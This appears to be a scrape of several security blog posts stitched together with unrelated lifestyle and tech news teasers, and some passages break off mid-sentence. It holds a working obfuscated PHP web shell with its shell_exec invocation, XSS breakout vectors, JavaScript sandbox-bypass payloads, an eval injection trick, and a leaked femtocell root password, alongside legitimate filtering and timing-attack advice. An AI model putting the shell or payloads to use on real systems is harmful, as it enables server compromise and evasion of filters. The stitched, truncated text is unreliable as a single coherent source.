So a small php shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off I started with the idea of using octal escapes in PHP and constructing the escape so for example: \107 is “G” if I could construct the “107″ and add the backslash to the beginning maybe I could construct “G”. It worked like this:

$_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);
$__=+"";
$__++;
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107
$___="\\$___";

But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped.
Then I had a brain wave, php automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. I had “A”, “r”, “r” etc but I really needed “GET” in order to create a nice small non-alpha shell.

Onto the second technique, PHP allows you to use bitwise operators on strings

'a'|'b';//c!

We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create “GET” and thus make our non-alphanum small PHP shell

<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|" ").($_[+""]|" ").($_[+""]^" ");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>

The first part converts a string into an array by attempting to assign to “0″ position of the string. Then I make sure the array is a string. Then I use “A” from array with bitwise operators to construct “G”, “E” and “T” using the characters “A”|0×6, “A”|0×5 and “A^0×15″. There you have it,you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.

To call the shell you’d use:
?_=shell_exec&__=whoami

Don’t forget in order to analyze php code use RIPS if you ever encounter this in the wild.

The problem as I see it
Where to start? Let me start by telling you that most of the books you read are wrong. The code samples you copy of the internet to do a specific task are wrong (the wrong way to handle a GET request), the function you copied from that work colleague who in turn copied from a forum is wrong (the wrong way to handle redirects). Start to question everything. Maybe this blog post is wrong this is the kind of mindset you require in order to protect your sites from XSS. You as a developer need to start thinking more about your code. If a article you are reading contains stuff like echo $_GET or Response.Write without filtering then it’s time to close that article.

Are frameworks the answer? I think in my honest opinion no. Yes a framework might prevent XSS in the short term but in the long term the framework code will be proven to contain mistakes as it evolves and thus when it is exploited it will be more severe than if you wrote the code yourself. Why more severe? A framework hole can be easily automated since many sites share the same codebase, if you wrote your own filtering code than an attacker would be able to exploit the individual site but find it hard to automate a range of sites using different filtering methods. This is one of the main reasons the internet works today, not because everything is secure just because everything is different.

One of the arguments I hear is that a developer can’t be trusted to create a perfect filtering system for a site and using a framework ensures the developer follows best guidelines. I disagree, developers are intelligent they write code and understand code, if you can build a system you can protect it because you’re in the best position to.

How to handle input
When you handle user input just think to yourself “a number is a vector”, imagine a site that renders a image server side and allows you to choose the width and height of the graphic, if you don’t think a number is a vector then you might not put any restrictions on the width and height of the generated graphic but what happens when an attacker requests a 100000×100000 graphic? If you’re code doesn’t handle the maximum and minimum inputs then an attacker can DOS your server with multiple requests. The lesson is not to be lazy about each input you handle, you need to make sure each value is validated correctly.

The process should be as follows.
1. Validate type – Ensure the value your are getting is what you were expecting.
2. Whitelist – Remove any characters that should not be in the value by providing the only characters that should.
3. Validate Length – Always validate the length of the input even when the value isn’t being placed in the database. The less that an attacker has to work with the better.
4. Restrict – Refine what’s allowed within the range of characters you allow. For example is the minimum value 5?
5. Escape – Depending on context (where your variable is on the page) escape correctly.

You can make things easier for yourself by placing these methods into a function or a class but don’t overcomplicate keep each method as simple as possible and be very careful and descriptive with your function names to avoid confusion.

HTML context
Lets look at an example of the method above with a code sample in PHP.

<?php
$x = (string) $_GET['x']; //ensure we get a string not array
$x = preg_replace("/[^\w]/","", $x); //remove any characters that are not a-z, A-Z, 0-9 or _
$x = substr($x, 0, 10);//restrict to a maximum of 10 characters
if(!preg_match("/^a/i", $x)) {//this value must only begin with a or A
$x = '';
}
echo '<b>' . htmlentities($x, ENT_QUOTES) . '</b>'; //escape everything according to context of $x
?>

You might be wondering why I used (string) in the code above. Lets try it without it.

Using the following:test.php?x[]=123
Results in: “Warning: substr() expects parameter 1 to be string, array given”

Because of the PHP feature which allows you to pass arrays over a GET request you can create a warning in PHP over unexpected type when trying to whitelist the value. Using type hinting ensures you get the expected type.

Great so we now understand how to restrict and escape a value. Lets look at another context.

Script context
When not in XHTML/XML mode a script tag does not decode HTML entities. If you have a value within a variable inside a script tag, question is what do you escape?

example:

<script>x='value here';</script>

Inside a JavaScript variable like this you have to watch out for the following ‘ and </script> using these vectors it’s possible to XSS the value. The two examples are listed below.

vector 1: ',alert(1),//
vector 2: </script><img src=1 onerror=alert(1)>

The second example requires no quotes and a lot of developers assume it won’t be executed because it’s still inside a JavaScript variable, this is clearly wrong as it executes because the browser doesn’t know where the script begins and ends correctly.

To escape a value inside a script context you should JavaScript escape the value. The best way of doing this is using unicode escapes, a unicode escape in JavaScript looks like the following:

<script>
alert('\u0061');//"a" in a unicode escape
</script>

You can experiment with unicode escapes using my Hackvertor tool. Please understand how they work as they will be very important to you when understanding how to protect many contexts.

It’s very important you follow the same procedure as before (Validate type, Whitelist, Validate Length, Restrict, Escape) for the specific variable you’re working on but this time we will convert our value into unicode escapes. A simple function to do that is as follows:

<?php
function jsEscape($input) {
if(strlen($input) == 0) {
return '';
}
$output = '';
$input = preg_replace("/[^\\x01-\\x7F]/", "", $input);//remove any characters outside the range 0x01-0x7f
$chars = str_split($input);
for($i=0;$i<count($chars);$i++) {
$char = $chars[$i];
$output .= sprintf("\\u%04x", ord($char));//get the character code and convert to hex and prefix with \u00
}
return $output;
}
?>

I’ve purposely designed this function with a few little optimisations missing, for example instead of using unicode you could use hex escapes since we restrict the range of allowed characters, alphanumeric characters are even converted when they could be replaced by their literal characters and new lines/tabs are encoded too when you could use the shorter equivalent. Lets add a line to use a literal tab character instead of \u0009. Why would you want to do this? To reduce the characters sent down the wire.

Code to handle tab:

<?php
if(preg_match("/^\t$/", $char)) {
$output .= '\\t';
continue;
}
?>

This converts a tab specifically to “\t”, notice how we separate input and output and by using continue we can skip the input character and override it with something more specific. The full code is now below for clarity.

<?php
function jsEscape($input) {
if(strlen($input) == 0) {
return '';
}
$output = '';
$input = preg_replace("/[^\\x01-\\x7F]/", "", $input);
$chars = str_split($input);
for($i=0;$i<count($chars);$i++) {
$char = $chars[$i];
if(preg_match("/^\t$/", $char)) {
$output .= '\\t';//don't unicode escape but using a shorter \t instead. Double escape remember!
continue;//skip a line and move on the the next char
}
$output .= sprintf("\\u%04x", ord($char));
}
return $output;
}
?>

Exercises for this code:
1. Can you handle characters outside the ascii range?
2. Convert any non dangerous character to their escaped or literal representation.

Script context in XHTML
In the previous section you might have wondered about XHTML when I stated “when not in XHTML/XML mode a script tag does not decode HTML entities”. In XHTML entities can be decoded even inside script blocks! Fortunately the code I provided for that section will handle that since unicode escapes are used. If you followed the exercises in that section did you make the “&” safe? That is something to think about when you are working on XHTML page. In order for XHTML to be used in the browser you have to serve the pages with the correct XHTML header. I recommend you don’t use the XHTML header.

Even though the previous examples still protect you against attack, I will show you a couple of vectors for XHTML sites/

<script>x='&#39;,alert(/This works in XHTML/)//';</script>

<script>x='&apos;,alert(/This also works in XHTML/)//';</script>

This would work in any XML based format, entities can be used to break out of strings and just a simple &lt/ will also do the trick. Don’t use XHTML or if you do unicode escape and don’t allow literal “&”.

JavaScript events
Now you know what happens in XHTML, you might be interested to know it also happens in HTML attributes. Any HTML attribute including events such as onclick will automatically decode entities and use them as if they were literal characters. Best demonstrated with a code example.

<div title="&gt;" id="x">test</div>
<script>
alert(document.getElementById(&apos;x&apos;).title);
</script>

As you can see instead of the value of the title attribute of the div element returning “&gt;” it returned “>” because it was automatically decoded. This whole process is one of the root causes of XSS, the developer didn’t understand that. Lets look at what happens with a onclick event and a variable of “x”.

<a href="#" onclick="x=&apos;&#39;,alert(1),&#39;&apos;;">test</a>

Clicking on the link fired the alert because like XHTML the entities are decoded, when you are in the attribute context you need to do exactly the same as if you were in the XHTML context. Reusing your jsecape function will fully protect you from XSS in attributes and variables like this.

innerHTML context
I hope you’ve grasped the previous concepts because now it’s going to get slightly confusing. If you[…]

Checking your luggage is like gambling with your belongings. Something could break, get stolen, lost, and so on, and checked baggage generally comes with high fees. Here's how to almost guarantee you'll never have to check your luggage again and, if all plans fail, how to make the best of a bad situation. More »

Looking for a place to stash some cash, jewelry, or other valuable objects? Your home offers plenty of hiding spaces, and the Construction of Secret Hiding Places is a free manual that will teach you how to use or make them. More »

As an anti-theft measure, clothing stores tag certain items with security tags so you'll set off an alarm when you leave with the tag still on the garment or ruin it by spilling ink from the tag if you try to remove it yourself. This isn't a problem so long as the tag gets removed before you leave the store, but sometimes clerks can miss a tag at checkout. If that's happened to you, here's what you can do about it. More »

It appears this unicode monster keeps chomping away at JavaScript parsers, this time it’s chrome. There was an excellent post from jack masa about JavaScript comments. In it he describes how chrome allows any character which ends in 2a or 2f \uxx2a+\u002f to be used as a “*” or “/”. Pretty crazy I’m sure you’ll agree but nice.

So I thought maybe Chrome has the same problems as Opera when parsing unicode escapes. Of course it does.

uuuu=alert;\u\u\u\u(1)

Yuk I don’t want backslashes in my variables thanks.

So does it go deeper? Of course it does.

eval("Object.defineProperty(window,'u661',{get:function(){alert(1)}});\\u61");

Here I think the parser moves back a character and outputs the 6 twice.

Tested on 15.0.849.0 dev-m

A company that makes a security product designed to thwart problems such as comment spam has added new security and customization features for website owners.
NuCaptcha's self-titled product takes a different approach to the Captcha, which stands for "Completely Automated Public Turing Test to Tell Computers and Humans Apart."

If you need to have an encrypted, private chat but don't have the tools handy to do so, you can just use Cryptocat. While anyone will be able to enter the chatroom if they know its name, nobody without your secret key will be able to see what you're saying. More »

I saw this post from Thomas Stig Jacobsen. He uses eval to decompile the code, I thought there has to be a better way so in literally about 30 minutes I managed to do it after a few tweaks to the JSReg code base. What does non-alphanumeric JavaScript look like?

$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__$+$.__$+$.___+$.$$$_+(![]+"")[$._$_]+(![]+"")[$._$_]+$._$+",\\"+$.$__+$.___+"\\"+$.__$+$.__$+$._$_+$.$_$_+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$._$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\\"\\"+$.$__+$.___+")"+"\"")())();

Produced by my friend Yosuke Hasegawa using his JJEncode.

How the hell do you decode that Gareth? (I hear you say). Quite easily actually. First off I extend the Hackvertor environment to allow sandboxed code to call the JSReg parser.

parser.extendWindow("$sandbox$", function(code){});

This makes “sandbox” a global function within each tag, I need to do this because I want to listen for any calls to “Function” and instead of eval’ing the results I simply want to return the string generated. To do this I add more code to the “sandbox” function to create an instance of JSReg and execute the code:-

parser.extendWindow("$sandbox$", function(code){
var js = JSReg.create(), result;
js.setDebugObjects({doNotFunctionEval:true,functionCode: function(code) {
code = code.replace("J.F();var $arguments$=J.A(arguments);",'');
result = code;
}});
try {
js.eval(code);
} catch(e){
return e;
}
return result;
});

So as you can see the magic happens in the debug objects of JSReg, I use the “doNotFunctionEval” to listen to Function but not eval the code sent. Then I use another listener to “functionCode” to intercept the results.

The final Hackvertor tag is dead simple:-

(function(){
return sandbox(code);
})();

The final results can be seen here:-
Decode non-alpha please feel free to go whoa now. That’s sandboxed code calling a unsandboxed function, sending a non-alpha string, sandboxing it, listening to the results and returning the decoded code. In the blink of an eye

Credits as always to Lever one and Jonas Magazinius for testing JSReg and making this possible.

[John Boxall] of Little Bird Electronics was thinking about combination locks, and how one might improve or at least change the way these locks work. Traditional combo locks can be implemented in a variety of ways, most of which we are all familiar with. Standard rotary padlock and keypad-based electronic safes work just fine, but he was interested to see how one might implement a single button combination lock.

[John] determined that the best, if not only way, to build this sort of lock would require him to measure button press intervals. In his case he decided to monitor the intervals between his button presses instead, but the concept is the same. He first tested himself to see how accurately he could press and release the button, leaving a one-second space between presses. After looking at the results he determined that he would need to incorporate at least a 10% margin for error into his code in order to compensate for human error.

He then created an Arduino sketch to test his idea, defining a set of key press intervals that could be used to ‘unlock’ his imaginary vault. It worked quite well, as you can see in the video demo below.

Now we’re not suggesting that you lock up your mind condition My Little Pony collection or your illegal arms stash with this type of lock, but it could be useful as an extra failsafe for certain projects/gadgets that you want to keep all to yourself.

Filed under: arduino hacks, security hacks

As phone systems have evolved over time, the desire to break them and exploit their usage continues to flourish. Just recently, [The Hacker’s Choice (THC)] announced that they had accessed secure data from Vodafone’s mobile phone network last year, via their femtocell product.

The purpose of the femtocell is to extend mobiile network coverage to locations where reception might not be ideal, routing calls to Vodafone’s network via IPSec tunnels. [THC] knew that this meant the femtocells required a high-level of interaction with the carrier’s traditional mobile network, so they started poking around to see what could be exploited.

After gaining administrative access to the femtocell itself using the root password “newsys”, they found that they were able to allow unauthorized users to utilize the service – a simple ToS violation. However, they also had the ability to force any nearby Vodafone subscriber’s phone to use their femtocell. This enabled them to request secret keys from Vodafone, which they could then use to spoof calls and SMS messages from the victim’s phone without their knowledge.

They have been kind enough to release all of the pertinent information about the hack on their wiki for any interested parties to peruse. Now we’re just wondering how long it takes before stateside carriers’ femtocells are exploited in the same fashion.

[Thanks, kresp0]

Filed under: cellphones hacks, security hacks

File syncing is a godsend when you work on multiple computers or devices and want to make sure you have the most up-to-date files wherever you log in. While online services like Dropbox may be the most convenient options, there are plenty of reasons you may want to "roll your own cloud" and sync your files to your own web server or just on your local network. Below, we'll detail how to set up a Dropbox clone, complete with instantaneous, encrypted syncs, cloud backups, and file versioning, using cross-platform software GoodSync. More »

Dear Lifehacker, More »

With many sites being compromised and user data released publicly on the web, you may have fallen victim. Should I Change My Password? is a simple webapp can tell you if you may be at risk. More »

Dropbox accidentally dropped the need for password authentication this past Sunday so anyone could log into anyone else's Dropbox account with any password—all they'd need was an email address. This lasted four hours and, according to Dropbox, less than 1% of users were affected. Still, this is another good reason why you should add an extra layer of security to the data in your Dropbox—particularly if you're putting sensitive data in there. More »

Android: ESET Mobile Security is a full suite of security and privacy tools rolled into one app. Full-phone antivirus and malware scanning, call/SMS/MMS blacklisting, and a host of anti-theft features are all accessible from the main screen. As if that weren't enough, the app also has built-in system monitoring functions to show you every running process along with its resource usage. The app's in beta at the moment, but it runs as smooth as it looks—and it's free. More »

An Android personal data leakage epidemic has just been revealed. The vulnerability affects 99% of Android phones and may allow hackers to steal your Facebook, Google Calendar, or other personal data if you use a rogue open Wi-Fi network. Here's how to protect yourself. More »

Windows only: If you're sick of locking your computer and entering your password every time you come back to it, Predator will ease the process by using a thumb drive as a "key" that instantly locks and unlocks your computer. More »

Dear Lifehacker, More »

Symantec today warned that advertisers, analytic platforms, and other third parties may be able to access Facebook users' personal information using inadvertently leaked application tokens.

If you've put off installing anti-theft software like Prey for so long that your laptop gets stolen before you get a chance, Consumerist reader Ryan notes that Dropbox can actually help you locate your missing computer. More »

iOS: Sign Me Out is a helpful iOS app that'll let you remotely check up on your Gmail and Facebook accounts to see if you're signed in from any other locations. If you are, you can click a big red sign me out button to disconnect a potentially unauthorized user. More »

EMC issued a warning today that hackers have stolen information about its RSA SecurID two-factor authentication that could be used by cybercriminals to more easily breach customers' systems,

Some people avoid any and all update notices—and you can't always blame them, given how many occur on the average computer. Reader Andrew Chandler suggests fixing their ignoring ways with the no-fuss Ninite installer and Task Scheduler automation. More »

I set a cool Hackvertor challenge on slackers. The idea was to call the function defined in window. There is a perfectly legitimate way of doing this as I discovered the method when I was testing it, instead of fixing it I created the challenge. Stefano Di Paola of course figured it out, nice work however something happened that I wasn’t expecting, Soroush Dalili solved the challenge by breaking the sandbox instead! Not just once may I add but twice. This was really awesome on a number of levels and so I awarded him 2000 HV points. I was impressed.

Bypass 1 – RegEx rewrite error

;
b=1/alert('Soroush Dalili Bypass! \n'+window.document.location);alert(window.parent.execTag())
//

So here Soroush cleverly exploits two errors in JSReg, first is the failure to strip the single line comment which then fools the regex rule into thinking that the code is a regex object and not function calls. The patch for this is displayed here I change the regex not to work in multi-line mode which successfully removes the single line comment. It isn’t an ideal fix as the regex rule still shouldn’t have matched it as a regex object but it will work in the short term until I revise the regex code.

Bypass 2 – eval object type hack

b='x='+String([eval])+';window.parent.execTag();'
y=eval([b]);

Another clever trick, the string is placed inside of an array and when the eval function is called it used to check the object type if it was a string then it rewrote the code if not it was assumed to be a already rewritten string however I didn’t expect an array to be used in this context so this would effectively bypass the sandbox. The fix for this one was to check specifically for a function object or rewrite the string.

I challenged many security researchers to break this sandbox and only a few have succeeded, I admire their skill and dedication. I would like to thank Soroush Dalili for taking the time to break JSReg and show some obvious excellent js sandbox skills.

We’ll be giving a Blackhat talk on exploiting remote timing attacks. Our goal is to convince developers that this class of attack is exploitable and worth fixing. This article in Computer World gives a decent background.

The attack is very simple. You repeatedly send guesses about a secret value to the server, which rejects them as incorrect. However, if your first byte of the guess is correct, it takes a very slightly longer time to return the error. With many measurements and some filtering, you can distinguish this difference.

While any comparison against a secret is a potential target, we chose HMAC comparison for a few reasons. An HMAC is a message authenticator, similar to a digital signature. The primary difference is that the the verifying party must keep the true HMAC secret since it gives the attacker the correct authenticator for their forged message. HMACs are used in many protocols, including most web authentication frameworks such as OAuth and OpenID and HTTP session cookies.

Guessing the correct HMAC for an arbitrary message is game over for these authentication frameworks. The token grants access to resources or allows the attacker to assume a user’s identity on various websites.

This is not a new attack. Remote timing attacks on OpenSSL were shown to be practical in 2003. Further research in 2007 showed that differences as small as 20 microseconds over the Internet and 100 nanoseconds over the LAN could be distinguished with about 1000 samples.

We (and others) have been reporting these flaws for over a year and raising developer awareness. In 2009, we found a timing leak in Google Keyczar‘s HMAC verification that was quickly fixed. Coda Hale found a similar flaw in Java’s MessageDigest implementation. The OAuth group discussed his bug back then and some maintainers decided to fix it in their code too. But many didn’t.

A quick review of OAuth and OpenID implementations showed many had timing leaks that were potentially exploitable. Either developers knew about the bug and gave it a low priority or they weren’t aware of it. Either way, we thought some concrete research was needed to show exactly how easy or hard it was to exploit these flaws in various environments.

Exploiting timing attacks depends on extracting a timing difference from many samples by filtering out the effect of noise. If there is too much noise (the difference is too small), this attack may take too long to be practical. But an attacker who can control the environment to decrease noise (say, by blocking competing users of the server), accurately model the noise and thus filter it better, or just wait longer because their target is so valuable might be successful.

Our talk builds most closely on the Crosby 2007 paper mentioned above. We have tested many configurations to find how different variables influence an attacker. The most obvious analysis is how small a time delta can be distinguished for a given number of samples. This was performed from various vantage points (guest-to-guest VM, LAN, Internet) and for various languages (C, Python, Ruby, Java, etc.)

We applied various filtering methods to the samples to see how much unfiltered jitter remained. This would determine how small a difference could be distinguished. We added in other variables such as competing load, power management, and other factors.

The talk will have the full results. Both the proponents and skeptics should be surprised in some way. We have found some configurations that are almost certainly not exploitable and others that certainly are. If you’re the maintainer of a software package, don’t count on your users being safe from timing attacks because of your assumptions. Cryptographic software, especially open-source, is deployed in everything from slow embedded servers on up to multi-Ghz clusters.

Likewise, attackers often have a better vantage point than you’d first assume. With shared hosting providers and cloud computing, you have to assume attackers can locate themselves on the same host as their target. Even in a shared datacenter, you may assume the attacker has a LAN-equivalent vantage point.

Given that it is difficult to rule out timing attacks and the fix is so simple, we think it’s best to fix them proactively. The approach that is easiest to gain assurance is to use a constant-time compare function. (That post also gives reasons why other approaches don’t work or are too complicated to verify).

We hope our talk will give some concrete results so that more developers will take this flaw seriously. See you in Vegas!

Custom setters syntax are being removed from Firefox in the next version.. boo I here you say well at least some of you. If you don’t know Firefox decided it would create it’s own setter syntax (I love it when you do that you know) ages ago and it looked something like this:-

a setter=alert,a=1//calls alert(1)

Whacky indeed. They decided to remove it. So I was messing with JavaScript like I do near enough every day and I stumbled upon this:-

Object.prototype.__noSuchMethod__=function(s){ alert(s); };
1..*(1)

What was surprising was that “alert” returned “*” not 1 as you would expect. The crazyness then continued:-

Object.prototype.__noSuchMethod__=function(s){ eval(s); };1.['alert(1)']()

Not looking at MDC and still not understanding why this was happening Mario pointed out “oh it’s sending the name of the function via the noSuchMethod” then big doh moment oh yeah. But then that means…..we have a new setter syntax!!!!

//existing code
function x(s) {
eval(s);
}
//our evil injection
Object.prototype.__noSuchMethod__=x;new/a/['alert(1)']

If you work at Mozilla please look away now because I like this crazy syntax so don’t fix it.

I don’t travel nearly as as much as I used to, yet when I do I always keep a sharp eye out for the technical glitches in devices around me in travel environments. What can I say? It provides me endless amusement.

While Linux boxes crashing in airlines’ on-board entertainment systems are nothing new, and several photos exist on the Internet depicting these crashes, I’m seeing something different these days…

On my way back from ph-neutral security conference in Berlin, I took a Continental 757 back to the US and observed the passenger entertainment system headrest in the row in front of me was frozen on the the movie selection GUI. The passenger in that seat asked the flight attendant to fix the problem and the headrest PC was rebooted from somewhere up front.

So, the funny (and a bit scary perhaps) bit is the screenshot I took of the reboot process. You can see the very high resolution photo here: http://tinyurl.com/linuxonplane

Observations from the linux crash on a plane photo:

1. 172.17.X.X private IP address range

2. FTP server IP address and transfer of system log tarball to the FTP server…user is “xxxxx” — imagine what the password might be…

Some reasonable concerns:

1. Tilting up the headrest PC and peeking behind it I saw CAT-5 cable. With a small tool or hands, and big cajones, an attacker *could possibly* unplug that cable and attach it to a laptop and hop onto the entertainment network. In addition, with some imagination and the right tools, an attacker could feasibly take over some or all aspects of the headrest PCs, including perhaps the sniffing of credit cards used by patrons, or even adding some specialized content…

2. This aircraft did not have on-board wireless Internet access, but I suspect that some airlines offering this service could have network crossover connectivity to different subnets, or perhaps only relying on VLANs for separation.

In the end, we can only hope that of the several networks likely running on a modern passenger jet, that true air-gapping is taking place and these systems are in no way connected to critical on-board networks. Time will tell if this is indeed the case. In the meantime, keep an eye out for those Linux boxes crashing on planes!

In this week's Security Levity, I want to address the fears raised about a new phishing trick. Dubbed tabnapping, it was recently dreamed up by Mozilla's Aza Raskin. Commentators around the web are worrying about its potential. But is the sky falling? No! Let's see why...

read more

Birth of the regex sandbox
I decided today to do a proper blog post to explain my reasons for creating regex sandboxes. I don’t often write a lot of words on this blog partly because I’m not very good a making long meaningful sentences and partly because I think the point can often be made in less words. Hopefully this will be useful for someone writing filters.

First off a quote “You can’t parse [X]HTML with regex. Because HTML can’t be parsed by regex. Regex is not a tool that can be used to correctly parse HTML” from (stackoverflow). I agree with the comment it isn’t possible to fully parse HTML with regexes but my goal wasn’t to do that, I wanted to parse a safe form of HTML. I also have a uncontrollable urge to do something that people say can’t be done.

Now we have that out of the way, how did this all begin? Well I was building a char by char JavaScript parser inside JavaScript to allow untrusted code to be executed. Every time I wrote a simple string matching function I found myself making shortcuts and using regexes instead. For example why loop through all characters when you can whitelist the desired ones? I soon found that I had a great advantage of using regexes instead of parsing every character, because I could use the native JavaScript engine to help me.

This lead me to develop JSReg [1], at first it seemed very easy to match JavaScript, the numbers were pretty easy and strings but I then encountered one of the first problems of regex sandboxes. It is very difficult to match something that is matching itself, for example an array can contain pretty much any JavaScript statement and itself but if you are defining it how can you match it? I didn’t really have an answer to this, one of my solutions to this problem was to create a recursive regex that created a second compiler to match inside the first match and so on. But this was slow and because JavaScript doesn’t have lookbehind previous matches would eat characters in the next match (I’ll talk more about this in the design). My other idea was to use backreferences but these are very difficult to track when using multiple regexes and they only return a successful match in my tests it wasn’t possible to produce a perfect array match using backreferences. I could be wrong of course I know I’m not perfect.

The design
My basis of my design was to not rely on 3rd party code were possible that means no jquery etc, in addition I should employ multiple layers of security wherever possible. These were good design decisions. Throughout initial testing the multiple layers proved difficult to break down. For JSReg the first layer was an iframe, the iframe was created each time of execution enabling fresh prototypes and a throw away box once execution had finished. Then I whitelisted the entire JavaScript objects/properties, this was done by forcing all methods to use suffix/prefix of “$”. Each variable assignment was then localized using var to force local variables. Each object was also checked to ensure it didn’t contain a window reference.

Javascript arrays proved tricky as mentioned earlier because of the amount of code that can be included within them, initially I decided to try and match them and their contents. But there were several performance problems of matching all that code and JavaScript regex limitations. For example I use one regex with a replace function to globally match each sequence using groups, the idea is to match all the valid objects first. In the instance of an array you’d first match all regex objects, strings etc because they can contain a “[" and "]” then once all valid objects have been enumerated by the regex engine it will encounter the first “[" of our array.

This works well in practice for every object apart from arrays. In JavaScript the array literal shares the same syntax as the object accessor. Therefore you have to identify the difference between an array or object. Sounds easy?

[][0[0,0[0]]];
+[][0[0,0[0]]];
{}['I am an array']
~{a:0}['I am a object accessor']

As you can see with the samples above, you’d have to match the entire js syntax before the opening “[". Then if you don't match the entire sequence inside the array you won't know if the ending "]” is part of an array sequence or object. This problem was unsolved for a long time. The main reason was in order to protect against window references I rewrite object accessors like obj['abc'] to obj[JSREG_FUNC.gp('abc')] so the function returns a safe string which uses the prefix/suffix of $ e.g. abc becomes $abc$. Because a string is returned of the expression it would break an array if it wasn’t detected.

Detecting an array or object was difficult because of the design too, you see if a regex object is matched like /abc/ and is followed by a object accessor like /abc/['source'] the previous expression is eaten by the parser so the next match is effectively ['source'] which JSReg understandably thinks is an array. A simple way round this would be to lookbehind to see if a whitelist of characters make the opening “[" an array or not. But JavaScript doesn't support lookbehinds!

The simple workaround was to use Array(1,2,3) instead for arrays and assume all "[" and "]” were not arrays. This worked but it breaks existing code. Finally after many attempts I think I’ve come up with a solution. I store a list of previous matches and rewrite all array literals and object accessors into a function or method. This means I no longer need to detect the ending of the array as they both have a “)” instead of a “]”. Easily demonstrated with a code example:-

[1,2,3] //becomes:-
A(Number(1),Number(2),Number(3))

window['x']//becomes:-
$window$.JSREG_PROP('x')

Finally as part of the design I check the JavaScript syntax before and after conversion this provides another layer of security if the rewrite fails at any part of matching the code.

The code
JavaScript is difficult to match but I found HTML/CSS easier. At first I started the code for HTMLReg [2] and CSSReg [3] in a similar way to JSReg. Then I realized when hacking my own code how I could make it better to defend against attack. First off I employed a strict whitelist to remove any partial open HTML attacks and evil attributes that were obvious attacks. This means I didn’t stick to the HTML specification, I don’t allow any junk in attributes. For example if you want to include “<" or ">” inside a title attribute then you have to encode it. I may allow them in future if it can be proven safe but I’d rather not fight something I can’t win. You may disagree with what I’ve just said but your filter is probably being pwnd right now.

Once I had my whitelist of tags and attributes I constructed RegExes for any individual parts I wanted to match. For example text nodes, invalid tags and valid attributes, these would be nicely chained together in one big regex. Then each part is grouped so that you can match each expression and validate it.

Here is how it works:-

html.replace(mainRegExp, function($0, $styleTag, $tag, $text, $invalidTags) {}

Notice how I use the replace function, I don’t do html = html.replace because I only want to match the text in my regexes. I prefer to use replace because I have a nice reference to each group like this automatically with local variables. This was a lesson I learned from developing JSReg as if the replace fails it will return your plain code rather than rewrite it.

Inside the function I include a couple of things in each block I’ll use the text node as an example:-

if($text !== undefined && $text.length) {
output += $text;
parseTree+='text('+$text+')\n';
}

Here if the text node is matched it adds it to the output. Parse tree is a nice way of keeping track of what you’ve matched. It’s a useful debugging reference. The if statement is required because of browser inconsistencies when matching groups.

In the case of HTMLReg for performance reasons I have a whitelist to match a general tag, then inspect it further so I’m only matching a smaller amount of text. You can see that with the following code:-

if($tag !== undefined && $tag.length) {
if(!new RegExp('^<\\\/?'+allowedTags.source+'[\\s>]','i').test($tag)) {
return '';
}
parseTree+='tag('+$tag+')\n';
if(!/^<\/?[a-z0-9]+>$/i.test($tag)) {
$tag = parseAttrValues($tag);
}
output += $tag;
}

Once my tag has been matched I then start to parse attributes, I do this by creating a hidden div and reading it’s contents. This is cool for a number of reasons, we can read what the browser reads and our code automatically gets formatted. Because we then use the DOM it means our entities will be decoded for us. While testing I found that JavaScript won’t be executed using innerHTML without certain tags or attributes, if I whitelist the tags and attributes then I can use the innerHTML safely without having to worry about execution. I have a backup plan if this fails, I could be more strict with certain attributes if it’s possible to execute code.

Onto CSSReg! It didn’t exist nor did I think it was needed as I thought I could rely on the browser to ensure multiple CSS rules didn’t cross over from single CSS dom rules. I was wrong. It was proven by many talented researchers (mentioned in the thanks section) that it wasn’t possible to get the browsers to rewrite CSS safely. I had to write another regex sandbox. This time it wasn’t as tricky as first appeared. As long as I didn’t try to follow the madness of the specification again I should be able to produce some CSS that was safe from malicious code yet is useful enough to use.

First off I gathered a list of properties and identifiers, I removed crappy browser specific extensions yeah they are bad. ALL OF THEM. Then I used the same method of HTMLReg to match each part, the trickiest part this time was urls. There are so many ways to escape a css url in every browser, you h[…]

Need a good motivator to use different passwords for each site and pick passwords that aren't easily hacked? How about learning that, during the January security breach in China, Google's password and authentication system, "Gaia," was compromised by hackers. Google states that the intruders didn't get access to actual passwords, and they've been moving swiftly to make changes to Gaia ever since, but having access to Google's Gaia source code could pose problems to the search giant down the line—and users who once believed at least one cloud-based server system was mostly unbreakable. More »

Yeah you knew it was coming. This was easier than JavaScript parsing because I can use both the HTML and CSS renderers of the browser to make sure I can parse the code safely. So really this is CSS/HTML reg, I don’t support the style tag yet but that shouldn’t be difficult as I can just write a RegExp to match the style and contents then parse each rule.

How did I do it? With very little code of course, I use a restrictive RegEx to get the actual tags and attributes then using the DOM I make the browser render the attributes and read each one and delete the actual attributes and styles, then I put each rule and attribute back using a whitelist.

I remove any nodes that aren’t legal or malicious, the text portion of the node uses a whitelist of allowed characters and does not allow “<" or ">” this stops partial HTML attacks. Finally to clean up I let the browser render the HTML code for me and rewrite some make it prettier than others.

HTMLReg demo

Remember real men use JavaScript.

